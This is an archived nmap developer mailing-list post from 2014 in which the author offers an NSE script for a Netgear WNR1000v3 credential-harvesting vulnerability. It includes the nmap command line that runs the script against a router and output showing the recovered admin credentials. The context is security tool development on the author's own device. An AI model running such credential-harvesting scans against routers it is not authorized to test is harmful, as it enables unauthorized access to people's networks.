Home page logo
/

nmap-dev logo Nmap Development mailing list archives

Re: [NSE] Script for Netgear WNR1000v3 Credential Harvesting Exploit
From: Paul AMAR <aos.paul () gmail com>
Date: Fri, 14 Mar 2014 16:24:09 +0100

Hi there,

Did you think about adding this to the current revision ?

Cheers,
Paul


2014-02-11 22:02 GMT+01:00 Paul AMAR <aos.paul () gmail com>:

Good evening,

I developed the NSE script regarding the exploit : *Netgear WNR1000v3
Credential Harvesting Exploit* discovered by c1ph04.
This has been released the 26th of January 2014.

Here are few references :

- http://www.securelist.com/en/advisories/56330
- http://secunia.com/community/advisories/56330
and obviously :
http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html

I have a Netgear WNR1000 at home so I could try it by myself with the
default settings.
Command line to launch the script :

*./nmap -p80 -n -Pn --script http-vuln-wnr-1000 192.168.1.1 -d*

Output :

NSE: Script scanning 192.168.1.1.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting http-vuln-wnr-1000 against 192.168.1.1:80.
Initiating NSE at 21:49
NSE: username : admin
NSE: password : password
NSE: Finished http-vuln-wnr-1000 against 192.168.1.1:80.
Completed NSE at 21:49, 0.27s elapsed


Cheers,
Paul A.



_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]